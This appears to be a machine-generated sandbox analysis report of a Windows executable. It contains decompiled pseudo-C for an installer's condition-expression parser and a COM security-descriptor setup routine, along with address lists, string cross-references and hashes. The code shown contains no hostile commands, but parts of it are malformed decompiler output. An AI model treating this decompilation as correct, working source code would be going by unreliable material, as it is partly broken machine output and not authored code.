                                                                                                                                                                  																_push(_v12);
                                                                                                                                                                  																_t62 = _t214 + 4; // 0x54680779
                                                                                                                                                                  																_push( *_t62);
                                                                                                                                                                  																_push("Failed to parse condition \"%ls\". Invalid version format, at position %d.");
                                                                                                                                                                  																goto L36;
                                                                                                                                                                  															}
                                                                                                                                                                  														}
                                                                                                                                                                  													}
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_t195 =  *_t218 & 0x0000ffff;
                                                                                                                                                                  													if(_t230 == ( *_t218 & 0x0000ffff)) {
                                                                                                                                                                  														goto L37;
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t242 = 0x8007000d;
                                                                                                                                                                  														 *(_t214 + 0x28) = 1;
                                                                                                                                                                  														_t235 = 0x8007000d;
                                                                                                                                                                  														E004300D9(_t195, "condition.cpp", 0x2ee, 0x8007000d);
                                                                                                                                                                  														_push(_v12);
                                                                                                                                                                  														_t40 = _t214 + 4; // 0x54680779
                                                                                                                                                                  														_push( *_t40);
                                                                                                                                                                  														_push("Failed to parse condition \"%ls\". Unexpected character at position %d.");
                                                                                                                                                                  														L36:
                                                                                                                                                                  														_push(_t242);
                                                                                                                                                                  														E00430A57();
                                                                                                                                                                  													}
                                                                                                                                                                  												}
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										 *_t228 = 0xf;
                                                                                                                                                                  										L12:
                                                                                                                                                                  										_t241 = 1;
                                                                                                                                                                  										L106:
                                                                                                                                                                  										 *(_t214 + 0x14) = _v12;
                                                                                                                                                                  										 *(_t214 + 8) =  *(_t214 + 8) + _t241 + _t241;
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				L107:
                                                                                                                                                                  				return _t235;
                                                                                                                                                                  			}















































                                                                                                                                                                  0x0040553e
                                                                                                                                                                  0x00405541
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405541
                                                                                                                                                                  0x0040551e
                                                                                                                                                                  0x0040551b
                                                                                                                                                                  0x00405229
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405229
                                                                                                                                                                  0x00405223
                                                                                                                                                                  0x0040521a
                                                                                                                                                                  0x0040512e
                                                                                                                                                                  0x0040512e
                                                                                                                                                                  0x004051d7
                                                                                                                                                                  0x004051da
                                                                                                                                                                  0x00405205
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004051dc
                                                                                                                                                                  0x004051dc
                                                                                                                                                                  0x004051dd
                                                                                                                                                                  0x004051fa
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004051df
                                                                                                                                                                  0x004051e0
                                                                                                                                                                  0x004051ef
                                                                                                                                                                  0x004055ef
                                                                                                                                                                  0x004055ef
                                                                                                                                                                  0x004055ba
                                                                                                                                                                  0x004055ba
                                                                                                                                                                  0x004051e2
                                                                                                                                                                  0x004051e2
                                                                                                                                                                  0x004051e8
                                                                                                                                                                  0x004051e8
                                                                                                                                                                  0x004051e8
                                                                                                                                                                  0x004051e0
                                                                                                                                                                  0x004051dd
                                                                                                                                                                  0x004055bb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405134
                                                                                                                                                                  0x00405134
                                                                                                                                                                  0x00405136
                                                                                                                                                                  0x00405138
                                                                                                                                                                  0x004051c8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040513e
                                                                                                                                                                  0x0040513e
                                                                                                                                                                  0x00405145
                                                                                                                                                                  0x00405148
                                                                                                                                                                  0x0040516c
                                                                                                                                                                  0x0040516e
                                                                                                                                                                  0x0040516e
                                                                                                                                                                  0x00405172
                                                                                                                                                                  0x00405175
                                                                                                                                                                  0x00405176
                                                                                                                                                                  0x0040517d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405183
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405185
                                                                                                                                                                  0x00405185
                                                                                                                                                                  0x00405186
                                                                                                                                                                  0x0040518c
                                                                                                                                                                  0x00405190
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405193
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405183
                                                                                                                                                                  0x00405199
                                                                                                                                                                  0x004051a9
                                                                                                                                                                  0x004051b0
                                                                                                                                                                  0x004051b2
                                                                                                                                                                  0x004051ba
                                                                                                                                                                  0x004051bb
                                                                                                                                                                  0x004051bb
                                                                                                                                                                  0x004051be
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040514a
                                                                                                                                                                  0x0040514a
                                                                                                                                                                  0x0040514d
                                                                                                                                                                  0x0040515e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040514f
                                                                                                                                                                  0x00405150
                                                                                                                                                                  0x0040522b
                                                                                                                                                                  0x0040522b
                                                                                                                                                                  0x00405230
                                                                                                                                                                  0x00405453
                                                                                                                                                                  0x00405455
                                                                                                                                                                  0x00405456
                                                                                                                                                                  0x0040545a
                                                                                                                                                                  0x00405463
                                                                                                                                                                  0x00405470
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405472
                                                                                                                                                                  0x00405472
                                                                                                                                                                  0x00405479
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040547b
                                                                                                                                                                  0x0040547f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405481
                                                                                                                                                                  0x00405486
                                                                                                                                                                  0x0040548a
                                                                                                                                                                  0x00405491
                                                                                                                                                                  0x0040549d
                                                                                                                                                                  0x004054d1
                                                                                                                                                                  0x004054d8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040549f
                                                                                                                                                                  0x0040549f
                                                                                                                                                                  0x004054af
                                                                                                                                                                  0x004054b6
                                                                                                                                                                  0x004054b8
                                                                                                                                                                  0x004054c0
                                                                                                                                                                  0x004054c1
                                                                                                                                                                  0x004054c1
                                                                                                                                                                  0x004054c4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004054c4
                                                                                                                                                                  0x0040549d
                                                                                                                                                                  0x0040547f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405479
                                                                                                                                                                  0x004054e2
                                                                                                                                                                  0x004054f2
                                                                                                                                                                  0x004054f9
                                                                                                                                                                  0x004054fb
                                                                                                                                                                  0x00405503
                                                                                                                                                                  0x00405504
                                                                                                                                                                  0x00405504
                                                                                                                                                                  0x00405507
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405236
                                                                                                                                                                  0x00405239
                                                                                                                                                                  0x00405244
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040524a
                                                                                                                                                                  0x0040524c
                                                                                                                                                                  0x00405252
                                                                                                                                                                  0x00405294
                                                                                                                                                                  0x0040529a
                                                                                                                                                                  0x004052a0
                                                                                                                                                                  0x004052a6
                                                                                                                                                                  0x004052ab
                                                                                                                                                                  0x004052af
                                                                                                                                                                  0x00405376
                                                                                                                                                                  0x00405376
                                                                                                                                                                  0x00405377
                                                                                                                                                                  0x00405377
                                                                                                                                                                  0x00405377
                                                                                                                                                                  0x0040537b
                                                                                                                                                                  0x0040537e
                                                                                                                                                                  0x00405389
                                                                                                                                                                  0x0040538f
                                                                                                                                                                  0x0040539e
                                                                                                                                                                  0x0040539e
                                                                                                                                                                  0x004053a1
                                                                                                                                                                  0x004053a9
                                                                                                                                                                  0x004053ad
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,EB0043D5,00000001,?,004059AE,?,00000000,00000000,?,?,00405996,?,?,00000000,?), ref: 004050F8
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 004054C4
                                                                                                                                                                  • Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 00405357
                                                                                                                                                                  • NOT, xrefs: 004053F8
                                                                                                                                                                  • Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 004051BE
                                                                                                                                                                  • AND, xrefs: 004053D8
                                                                                                                                                                  • @, xrefs: 004050FE
                                                                                                                                                                  • -, xrefs: 00405239
                                                                                                                                                                  • Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 004052FC
                                                                                                                                                                  • condition.cpp, xrefs: 004051A4, 00405267, 004052E2, 0040533D, 004054AA, 004054ED, 0040552E
                                                                                                                                                                  • Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 00405507
                                                                                                                                                                  • ", xrefs: 0040513E
                                                                                                                                                                  • Failed to set symbol value., xrefs: 0040543E
                                                                                                                                                                  • Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 00405541
                                                                                                                                                                  • Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 00405281
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StringType
                                                                                                                                                                  • String ID: "$-$@$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
                                                                                                                                                                  • API String ID: 4177115715-2155003793
                                                                                                                                                                  • Opcode ID: bea32995ff9481cb0ed09a9c2eee66d472e41d96604d3ff3c8769b1e856c34a0
                                                                                                                                                                  • Instruction ID: f23c065968af7801baca7590086f758c6b45fcb93d6b1e02f208cf91278a1612
                                                                                                                                                                  • Opcode Fuzzy Hash: bea32995ff9481cb0ed09a9c2eee66d472e41d96604d3ff3c8769b1e856c34a0
                                                                                                                                                                  • Instruction Fuzzy Hash: 48E10171900A04EBDB258F40DC85BAB7BA5EF09710F6440A7F905AE2C5D7BDC981CF98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                                                  			E00432C36(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				char* _v12;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				int _v20;
                                                                                                                                                                  				int _v24;
                                                                                                                                                                  				int _v28;
                                                                                                                                                                  				int _v32;
                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                  				char* _v44;
                                                                                                                                                                  				intOrPtr _v48;
                                                                                                                                                                  				int _v52;
                                                                                                                                                                  				int _v56;
                                                                                                                                                                  				int _v60;
                                                                                                                                                                  				int _v64;
                                                                                                                                                                  				intOrPtr _v68;
                                                                                                                                                                  				intOrPtr _v72;
                                                                                                                                                                  				char* _v76;
                                                                                                                                                                  				intOrPtr _v80;
                                                                                                                                                                  				int _v84;
                                                                                                                                                                  				int _v88;
                                                                                                                                                                  				int _v92;
                                                                                                                                                                  				int _v96;
                                                                                                                                                                  				intOrPtr _v100;
                                                                                                                                                                  				intOrPtr _v104;
                                                                                                                                                                  				char* _v108;
                                                                                                                                                                  				intOrPtr _v112;
                                                                                                                                                                  				int _v116;
                                                                                                                                                                  				int _v120;
                                                                                                                                                                  				int _v124;
                                                                                                                                                                  				int _v128;
                                                                                                                                                                  				intOrPtr _v132;
                                                                                                                                                                  				intOrPtr _v136;
                                                                                                                                                                  				void* _v140;
                                                                                                                                                                  				intOrPtr _v144;
                                                                                                                                                                  				int _v148;
                                                                                                                                                                  				int _v152;
                                                                                                                                                                  				int _v156;
                                                                                                                                                                  				int _v160;
                                                                                                                                                                  				char _v164;
                                                                                                                                                                  				char _v168;
                                                                                                                                                                  				char _v232;
                                                                                                                                                                  				void _v240;
                                                                                                                                                                  				char _v304;
                                                                                                                                                                  				char _v312;
                                                                                                                                                                  				char _v376;
                                                                                                                                                                  				char _v384;
                                                                                                                                                                  				char _v448;
                                                                                                                                                                  				char _v456;
                                                                                                                                                                  				char _v520;
                                                                                                                                                                  				char _v528;
                                                                                                                                                                  				char _v532;
                                                                                                                                                                  				int _v536;
                                                                                                                                                                  				struct _SECURITY_DESCRIPTOR _v556;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t86;
                                                                                                                                                                  				signed short _t105;
                                                                                                                                                                  				signed short _t108;
                                                                                                                                                                  				signed short _t111;
                                                                                                                                                                  				signed short _t114;
                                                                                                                                                                  				signed short _t117;
                                                                                                                                                                  				signed short _t124;
                                                                                                                                                                  				signed short _t127;
                                                                                                                                                                  				signed short _t130;
                                                                                                                                                                  				signed short _t132;
                                                                                                                                                                  				struct _SECURITY_DESCRIPTOR* _t133;
                                                                                                                                                                  				signed short _t137;
                                                                                                                                                                  				void* _t138;
                                                                                                                                                                  				signed short _t140;
                                                                                                                                                                  				signed short _t141;
                                                                                                                                                                  				signed short _t142;
                                                                                                                                                                  				signed short _t143;
                                                                                                                                                                  				signed short _t144;
                                                                                                                                                                  				signed short _t145;
                                                                                                                                                                  				signed short _t146;
                                                                                                                                                                  				signed short _t147;
                                                                                                                                                                  				intOrPtr _t150;
                                                                                                                                                                  				void* _t155;
                                                                                                                                                                  				void* _t156;
                                                                                                                                                                  				intOrPtr* _t157;
                                                                                                                                                                  				intOrPtr _t158;
                                                                                                                                                                  				signed short _t162;
                                                                                                                                                                  				signed short _t165;
                                                                                                                                                                  				signed short _t168;
                                                                                                                                                                  				signed short _t171;
                                                                                                                                                                  				signed short _t174;
                                                                                                                                                                  				signed short _t177;
                                                                                                                                                                  				signed short _t180;
                                                                                                                                                                  				signed short _t183;
                                                                                                                                                                  				signed short _t186;
                                                                                                                                                                  				signed int _t190;
                                                                                                                                                                  
                                                                                                                                                                  				_t193 = __eflags;
                                                                                                                                                                  				_t149 = __ecx;
                                                                                                                                                                  				_t86 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t86 ^ _t190;
                                                                                                                                                                  				_v556.Revision = 0;
                                                                                                                                                                  				_t154 =  &(_v556.Sbz1);
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosw");
                                                                                                                                                                  				_push(0x9c);
                                                                                                                                                                  				asm("stosb");
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v164);
                                                                                                                                                                  				_v168 = 0;
                                                                                                                                                                  				E004267C0(0, __ecx,  &(_v556.Sbz1), _t155, __eflags);
                                                                                                                                                                  				_t156 = 0x40;
                                                                                                                                                                  				_push(_t156);
                                                                                                                                                                  				asm("xorps xmm0, xmm0");
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v232);
                                                                                                                                                                  				_v536 = 0;
                                                                                                                                                                  				asm("movlpd [ebp-0xec], xmm0");
                                                                                                                                                                  				E004267C0(0, __ecx,  &(_v556.Sbz1), _t156, __eflags);
                                                                                                                                                                  				_push(_t156);
                                                                                                                                                                  				asm("xorps xmm0, xmm0");
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v304);
                                                                                                                                                                  				asm("movlpd [ebp-0x134], xmm0");
                                                                                                                                                                  				E004267C0(0, __ecx,  &(_v556.Sbz1), _t156, __eflags);
                                                                                                                                                                  				_push(_t156);
                                                                                                                                                                  				asm("xorps xmm0, xmm0");
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v376);
                                                                                                                                                                  				asm("movlpd [ebp-0x17c], xmm0");
                                                                                                                                                                  				E004267C0(0, _t149, _t154, _t156, _t193);
                                                                                                                                                                  				_push(_t156);
                                                                                                                                                                  				asm("xorps xmm0, xmm0");
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v448);
                                                                                                                                                                  				asm("movlpd [ebp-0x1c4], xmm0");
                                                                                                                                                                  				E004267C0(0, _t149, _t154, _t156, _t193);
                                                                                                                                                                  				_push(_t156);
                                                                                                                                                                  				asm("xorps xmm0, xmm0");
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v520);
                                                                                                                                                                  				asm("movlpd [ebp-0x20c], xmm0");
                                                                                                                                                                  				E004267C0(0, _t149, _t154, _t156, _t193);
                                                                                                                                                                  				_v532 = 0;
                                                                                                                                                                  				if(InitializeSecurityDescriptor( &_v556, 1) != 0) {
                                                                                                                                                                  					_t157 = __imp__CreateWellKnownSid;
                                                                                                                                                                  					_t154 = 0x48;
                                                                                                                                                                  					_v532 = _t154;
                                                                                                                                                                  					_t105 =  *_t157(0x1a, 0,  &_v240,  &_v532);
                                                                                                                                                                  					__eflags = _t105;
                                                                                                                                                                  					if(_t105 != 0) {
                                                                                                                                                                  						_v532 = _t154;
                                                                                                                                                                  						_t108 =  *_t157(0x17, 0,  &_v312,  &_v532);
                                                                                                                                                                  						__eflags = _t108;
                                                                                                                                                                  						if(_t108 != 0) {
                                                                                                                                                                  							_v532 = _t154;
                                                                                                                                                                  							_t111 =  *_t157(0x18, 0,  &_v384,  &_v532);
                                                                                                                                                                  							__eflags = _t111;
                                                                                                                                                                  							if(_t111 != 0) {
                                                                                                                                                                  								_v532 = _t154;
                                                                                                                                                                  								_t114 =  *_t157(0x10, 0,  &_v456,  &_v532);
                                                                                                                                                                  								__eflags = _t114;
                                                                                                                                                                  								if(_t114 != 0) {
                                                                                                                                                                  									_v532 = _t154;
                                                                                                                                                                  									_t117 =  *_t157(0x16, 0,  &_v528,  &_v532);
                                                                                                                                                                  									__eflags = _t117;
                                                                                                                                                                  									if(_t117 != 0) {
                                                                                                                                                                  										_v140 =  &_v240;
                                                                                                                                                                  										_t150 = 3;
                                                                                                                                                                  										_v108 =  &_v312;
                                                                                                                                                                  										_v76 =  &_v384;
                                                                                                                                                                  										_t158 = 2;
                                                                                                                                                                  										_v44 =  &_v456;
                                                                                                                                                                  										_v12 =  &_v528;
                                                                                                                                                                  										_t124 =  &_v168;
                                                                                                                                                                  										_v168 = _t150;
                                                                                                                                                                  										_v164 = _t158;
                                                                                                                                                                  										_v160 = 0;
                                                                                                                                                                  										_v156 = 0;
                                                                                                                                                                  										_v152 = 0;
                                                                                                                                                                  										_v148 = 0;
                                                                                                                                                                  										_v144 = _t158;
                                                                                                                                                                  										_v136 = _t150;
                                                                                                                                                                  										_v132 = _t158;
                                                                                                                                                                  										_v128 = 0;
                                                                                                                                                                  										_v124 = 0;
                                                                                                                                                                  										_v120 = 0;
                                                                                                                                                                  										_v116 = 0;
                                                                                                                                                                  										_v112 = _t158;
                                                                                                                                                                  										_v104 = _t150;
                                                                                                                                                                  										_v100 = _t158;
                                                                                                                                                                  										_v96 = 0;
                                                                                                                                                                  										_v92 = 0;
                                                                                                                                                                  										_v88 = 0;
                                                                                                                                                                  										_v84 = 0;
                                                                                                                                                                  										_v80 = _t158;
                                                                                                                                                                  										_v72 = _t150;
                                                                                                                                                                  										_v68 = _t158;
                                                                                                                                                                  										_v64 = 0;
                                                                                                                                                                  										_v60 = 0;
                                                                                                                                                                  										_v56 = 0;
                                                                                                                                                                  										_v52 = 0;
                                                                                                                                                                  										_v48 = _t158;
                                                                                                                                                                  										_v40 = _t150;
                                                                                                                                                                  										_v36 = _t158;
                                                                                                                                                                  										_v32 = 0;
                                                                                                                                                                  										_v28 = 0;
                                                                                                                                                                  										_v24 = 0;
                                                                                                                                                                  										_v20 = 0;
                                                                                                                                                                  										_v16 = _t158;
                                                                                                                                                                  										__imp__SetEntriesInAclA(5, _t124, 0,  &_v536);
                                                                                                                                                                  										__eflags = _t124;
                                                                                                                                                                  										if(_t124 == 0) {
                                                                                                                                                                  											_t127 = SetSecurityDescriptorOwner( &_v556,  &_v240, 0);
                                                                                                                                                                  											__eflags = _t127;
                                                                                                                                                                  											if(_t127 != 0) {
                                                                                                                                                                  												_t130 = SetSecurityDescriptorGroup( &_v556,  &_v240, 0);
                                                                                                                                                                  												__eflags = _t130;
                                                                                                                                                                  												if(_t130 != 0) {
                                                                                                                                                                  													_t132 = SetSecurityDescriptorDacl( &_v556, 1, _v536, 0);
                                                                                                                                                                  													__eflags = _t132;
                                                                                                                                                                  													if(_t132 != 0) {
                                                                                                                                                                  														_t133 =  &_v556;
                                                                                                                                                                  														__imp__CoInitializeSecurity(_t133, 0xffffffff, 0, 0, 6, _t158, 0, 0x3000, 0);
                                                                                                                                                                  														_t159 = _t133;
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t137 = GetLastError();
                                                                                                                                                                  														__eflags = _t137;
                                                                                                                                                                  														_t162 =  <=  ? _t137 : _t137 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  														_t138 = 0x80004005;
                                                                                                                                                                  														__eflags = _t162;
                                                                                                                                                                  														_t159 =  >=  ? 0x80004005 : _t162;
                                                                                                                                                                  														_push( >=  ? 0x80004005 : _t162);
                                                                                                                                                                  														_push(0xea);
                                                                                                                                                                  														goto L20;
                                                                                                                                                                  													}
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_t140 = GetLastError();
                                                                                                                                                                  													__eflags = _t140;
                                                                                                                                                                  													_t165 =  <=  ? _t140 : _t140 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  													_t138 = 0x80004005;
                                                                                                                                                                  													__eflags = _t165;
                                                                                                                                                                  													_t159 =  >=  ? 0x80004005 : _t165;
                                                                                                                                                                  													_push( >=  ? 0x80004005 : _t165);
                                                                                                                                                                  													_push(0xe4);
                                                                                                                                                                  													goto L20;
                                                                                                                                                                  												}
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t141 = GetLastError();
                                                                                                                                                                  												__eflags = _t141;
                                                                                                                                                                  												_t168 =  <=  ? _t141 : _t141 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  												_t138 = 0x80004005;
                                                                                                                                                                  												__eflags = _t168;
                                                                                                                                                                  												_t159 =  >=  ? 0x80004005 : _t168;
                                                                                                                                                                  												_push( >=  ? 0x80004005 : _t168);
                                                                                                                                                                  												_push(0xde);
                                                                                                                                                                  												goto L20;
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											__eflags = _t124;
                                                                                                                                                                  											_t171 =  <=  ? _t124 : _t124 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											_t138 = 0x80004005;
                                                                                                                                                                  											__eflags = _t171;
                                                                                                                                                                  											_t159 =  >=  ? 0x80004005 : _t171;
                                                                                                                                                                  											_push( >=  ? 0x80004005 : _t171);
                                                                                                                                                                  											_push(0xd9);
                                                                                                                                                                  											goto L20;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t142 = GetLastError();
                                                                                                                                                                  										__eflags = _t142;
                                                                                                                                                                  										_t174 =  <=  ? _t142 : _t142 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										_t138 = 0x80004005;
                                                                                                                                                                  										__eflags = _t174;
                                                                                                                                                                  										_t159 =  >=  ? 0x80004005 : _t174;
                                                                                                                                                                  										_push( >=  ? 0x80004005 : _t174);
                                                                                                                                                                  										_push(0xa5);
                                                                                                                                                                  										goto L20;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t143 = GetLastError();
                                                                                                                                                                  									__eflags = _t143;
                                                                                                                                                                  									_t177 =  <=  ? _t143 : _t143 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  									_t138 = 0x80004005;
                                                                                                                                                                  									__eflags = _t177;
                                                                                                                                                                  									_t159 =  >=  ? 0x80004005 : _t177;
                                                                                                                                                                  									_push( >=  ? 0x80004005 : _t177);
                                                                                                                                                                  									_push(0x9e);
                                                                                                                                                                  									goto L20;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t144 = GetLastError();
                                                                                                                                                                  								__eflags = _t144;
                                                                                                                                                                  								_t180 =  <=  ? _t144 : _t144 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								_t138 = 0x80004005;
                                                                                                                                                                  								__eflags = _t180;
                                                                                                                                                                  								_t159 =  >=  ? 0x80004005 : _t180;
                                                                                                                                                                  								_push( >=  ? 0x80004005 : _t180);
                                                                                                                                                                  								_push(0x97);
                                                                                                                                                                  								goto L20;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t145 = GetLastError();
                                                                                                                                                                  							__eflags = _t145;
                                                                                                                                                                  							_t183 =  <=  ? _t145 : _t145 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t138 = 0x80004005;
                                                                                                                                                                  							__eflags = _t183;
                                                                                                                                                                  							_t159 =  >=  ? 0x80004005 : _t183;
                                                                                                                                                                  							_push( >=  ? 0x80004005 : _t183);
                                                                                                                                                                  							_push(0x90);
                                                                                                                                                                  							goto L20;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t146 = GetLastError();
                                                                                                                                                                  						__eflags = _t146;
                                                                                                                                                                  						_t186 =  <=  ? _t146 : _t146 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t138 = 0x80004005;
                                                                                                                                                                  						__eflags = _t186;
                                                                                                                                                                  						_t159 =  >=  ? 0x80004005 : _t186;
                                                                                                                                                                  						_push( >=  ? 0x80004005 : _t186);
                                                                                                                                                                  						_push(0x89);
                                                                                                                                                                  						goto L20;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t147 = GetLastError();
                                                                                                                                                                  					_t189 =  <=  ? _t147 : _t147 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t138 = 0x80004005;
                                                                                                                                                                  					_t159 =  >=  ? 0x80004005 :  <=  ? _t147 : _t147 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_push( >=  ? 0x80004005 :  <=  ? _t147 : _t147 & 0x0000ffff | 0x80070000);
                                                                                                                                                                  					_push(0x82);
                                                                                                                                                                  					L20:
                                                                                                                                                                  					_push("srputil.cpp");
                                                                                                                                                                  					E004300D9(_t138);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v536 != 0) {
                                                                                                                                                                  					LocalFree(_v536);
                                                                                                                                                                  				}
                                                                                                                                                                  				return L004267AF(_t159, _v8 ^ _t190, _t154, _t159);
                                                                                                                                                                  			}
                                                                                                                                                                  0x00432ca7
                                                                                                                                                                  0x00432ca8
                                                                                                                                                                  0x00432ca9
                                                                                                                                                                  0x00432cb1
                                                                                                                                                                  0x00432cb6
                                                                                                                                                                  0x00432cbd
                                                                                                                                                                  0x00432cc0
                                                                                                                                                                  0x00432cc1
                                                                                                                                                                  0x00432cc2
                                                                                                                                                                  0x00432cca
                                                                                                                                                                  0x00432ccf
                                                                                                                                                                  0x00432cd6
                                                                                                                                                                  0x00432cd9
                                                                                                                                                                  0x00432cda
                                                                                                                                                                  0x00432cdb
                                                                                                                                                                  0x00432ce3
                                                                                                                                                                  0x00432ce8
                                                                                                                                                                  0x00432cef
                                                                                                                                                                  0x00432cf2
                                                                                                                                                                  0x00432cf3
                                                                                                                                                                  0x00432cf4
                                                                                                                                                                  0x00432cfc
                                                                                                                                                                  0x00432d0d
                                                                                                                                                                  0x00432d1b
                                                                                                                                                                  0x00432d46
                                                                                                                                                                  0x00432d4e
                                                                                                                                                                  0x00432d60
                                                                                                                                                                  0x00432d66
                                                                                                                                                                  0x00432d68
                                                                                                                                                                  0x00432d6a
                                                                                                                                                                  0x00432da6
                                                                                                                                                                  0x00432dac
                                                                                                                                                                  0x00432dae
                                                                                                                                                                  0x00432db0
                                                                                                                                                                  0x00432dec
                                                                                                                                                                  0x00432df2
                                                                                                                                                                  0x00432df4
                                                                                                                                                                  0x00432df6
                                                                                                                                                                  0x00432e32
                                                                                                                                                                  0x00432e38
                                                                                                                                                                  0x00432e3a
                                                                                                                                                                  0x00432e3c
                                                                                                                                                                  0x00432e78
                                                                                                                                                                  0x00432e7e
                                                                                                                                                                  0x00432e80
                                                                                                                                                                  0x00432e82
                                                                                                                                                                  0x00432eb3
                                                                                                                                                                  0x00432ebb
                                                                                                                                                                  0x00432ec2
                                                                                                                                                                  0x00432ecb
                                                                                                                                                                  0x00432ed0
                                                                                                                                                                  0x00432ed7
                                                                                                                                                                  0x00432ee0
                                                                                                                                                                  0x00432eeb
                                                                                                                                                                  0x00432ef4
                                                                                                                                                                  0x00432efa
                                                                                                                                                                  0x00432f00
                                                                                                                                                                  0x00432f06
                                                                                                                                                                  0x00432f0c
                                                                                                                                                                  0x00432f12
                                                                                                                                                                  0x00432f18
                                                                                                                                                                  0x00432f1e
                                                                                                                                                                  0x00432f24
                                                                                                                                                                  0x00432f27
                                                                                                                                                                  0x00432f2a
                                                                                                                                                                  0x00432f2d
                                                                                                                                                                  0x00432f30
                                                                                                                                                                  0x00432f33
